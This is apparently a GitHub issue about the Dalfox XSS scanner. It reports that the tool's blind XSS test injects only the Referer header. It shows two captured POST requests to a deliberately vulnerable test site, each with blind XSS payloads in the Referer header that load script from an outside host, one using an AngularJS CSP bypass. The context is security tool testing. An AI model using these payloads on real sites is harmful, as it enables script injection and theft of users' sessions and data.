Open anasbousselham opened 1 year ago
Hi, Dalfox blind test only Header Referer: not the param. in the data of the POST request or the query's on the url.
Referer:
POST /guestbook.php HTTP/1.1 Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 Content-Length: 0 Content-Type: application/x-www-form-urlencoded Referer: "'><script src=//js.rip/xxx></script> Accept-Encoding: gzip, deflate Connection: close
POST /guestbook.php HTTP/1.1 Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 Content-Length: 0 Content-Type: application/x-www-form-urlencoded Referer: "'><script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js></script><div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//js.rip/xxx'"></textarea></div> Accept-Encoding: gzip, deflate Connection: close
Hi, Dalfox blind test only Header
Referer:not the param. in the data of the POST request or the query's on the url.